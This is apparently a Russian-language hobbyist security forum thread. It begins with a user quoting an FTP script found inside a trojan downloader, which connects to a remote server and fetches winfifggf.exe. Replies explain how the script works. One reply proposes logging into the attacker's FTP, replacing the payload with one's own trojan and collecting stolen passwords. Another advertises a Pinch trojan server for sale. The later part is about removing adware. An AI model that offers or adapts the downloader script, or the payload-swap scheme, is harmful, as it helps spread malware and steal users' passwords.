Люди! Короче у меня Каспер орёт и пишет что найде Trojan Downloader! Я через каспера нашёл трой и посмотрел из чего он написан!


open [Тут IP затем 30294]
user 1 1
get winfifggf.exe
quit

Что этот троян делает? и как можно обратить такой для свойх целей?

Да троян это тебе дают его ты его запускаешь и он с указанного сайта перекидывает трой на твою такчку а потом запускает.

А вот что он тырит с меня этот троян? 30294 чё эти цыфры ознаяают? и как такойже сделать только в свою пользу?
Почему так распрашиваю потому что конкретно взялся за дело терь только изучаю виры и трояны! поэтому ного вопросов!

30294 ето пароль на твой компутер! именно его троян и тЫрит!
чтобы "обернуть ето себе на пользу" есть два варианта действий
1 - незамедлительный формат C
2 - прекращаешь страдать х***ей прямо сейчас

зы:
на заметку юным натуралистам
за 10вмз предоставлю для исследований прекрасный екземпляр пинчевского сервака. по вопросам оптовой закупки обращаться в приват =)

open [Тут IP затем 30294]
user 1 1
get winfifggf.exe
quit

Что этот троян делает? и как можно обратить такой для свойх целей?
Мне вообще интересно, как может новичёк выдрать стоко инфы из троя, и при этом не знать, что это значит :)

Это троян-Downloader, те в него встроена лишь фунцция закачки чего-нить. Он лезет в интернет по указанному айпи на указанный порт(30294). Судя по синтаксису запроса, это ФТП-сервер. Трой авторизуется под именем юзера "1" и под паролем "1". Затем скачивает к тебе на комп основного тело трояна "winfifggf.exe".

Впринципе, он способен тут же его запустить ФТП-командой "!winfifggf.exe"(кажись, так)
Либо через реестр после перезагрузки.

Как это можно использовать?
Можно зайти на этот ФТП-сервак через какой-нить клиент (например, тотал-командер). Если очень повезёт, у тебя будут прова на запись.
Тогда делаешь своего троя и заменяешь родного на своего =] Гы..
И забираешь отчеты с паролями со своего мыла.

Судя по синтаксису запроса, это ФТП-сервер. Трой авторизуется под именем юзера "1" и под паролем "1".

У фтп сервера, если читать RFC, видно такие команды
USER username
PASS password
а не USER username password,
далее
команды GET вообще несуществует, есть RETR и STOR
и команды OPEN тоже нет

однако, возможно это сценарий для ftp-клиента в Windows (стардартного), но никак не для фтп сервера


как может новичёк выдрать стоко инфы из троя

А вот так, надо хотябы как-то шифровать строки, чтобы их видно небыло в плейнтекст. А не на делфи мучить комп)

Уважаемые форумчанею. Помогите избавиться от всплывающих окон эксплоера. Гуляя по сайтам, мой антивирус предупреждал меня о "Download. Troyan", но несмотря на это я все-равно открывала странички и закачивала необходимые мне файлы. Теперь каждую минуту ко мне лезет реклама, даже если все окна закрыты. Я проверяла компьютер:
Spybot - Search & Destroy
Ad-Aware SE Personal
Registry Mechanic
HijackThis

Все они находят проблему, якобы удаляют опасные файлы, но потом оповещают меня о том, что неудалили, т.к. в памяти где то они остались. Ничего не помогает. Я блокировала всплывающие окна, вносила в черный список, удалила все куки, временные файлы и исключения- ничего не помогает.
Что мне делать?
Адреса всплывающих окон начинаются и заканчиваются на "http://www...................com/normal/yyy102.html"

Я проверяла компьютер

Чел, ты ошибся буквой - проверял а не "проверяла"


Помогите избавиться от всплывающих окон эксплоера.

http://stopie.org.ru/

Почему "проверял"? Я- "она", я проверяла.
Ссылочка не открывается.

Вот сюда зайди http://stopie.org.ru/links.htm (там только для Firefox) :)

Снеси этот IE!! Поставь Opery или FireFox!!!! поставь Каспера, последнее обновление и проверь комп!

А что такое "Снеси этот Ie!!"?
Вышеуказанные ссылочки не открываются.

Насколько я поняла у меня Troyan Look2Me.
Вот скриншот http://img218.imageshack.us/img218/5295/44cx.jpg
и эта хрюня не удаляется. Он пишет, что удалил, но при повторной выборке, даже после перезагрузки и формате, опять ее находит...

И еще добавлюсь: на скриншоте вы увидите 3 ярлычка слева на рабочем столе с сердечком, самолетом и диском- они вскакивают сами по себе... я их тоже не раз уже удаляла... они как блохи по рабочему столу...

Ну вот, приехали...
Тут Троянского Коня по запчастям разбирают..., а у меня Ахиллеас где то безнаказанно прячется...

В общем что бы я зделал, окажись у тебя за компом...
Удалил бы каспер, поставил Nod 32 с новыми базами и проверил бы весь комп на вирусы... Если же какие-то жизненно важные файлы для винды оказались бы заражены и не удалялись, снёс бы винду и установил бы новую.
p.s. Каспер, internet explorer - полный ацтой... Вместо ie лучше юзай Mozilla Firefox

Винда уже и сама слетела. Поставила все с нуля. Проблем больше нет. А Касперского я и сама не уважаю. У меня сейчас Симантек 2006. А был Нортон 2005.

Возвращаюсь к теме. Сегодня хотела установить скаченного еDonkey снова тот же троян, но успела на корню с помощью Trojan Remover удалить. Вместе с еDonkey . Первый раз тоже было через него же.

Это знаеш чо за тройчик ? это X-control удаленное администратирование у него выходит не плохо...фаервол поставь нормальнвый..касперского выкинь,ставь типа Nod32 и ZoneAlarm новой версии ;)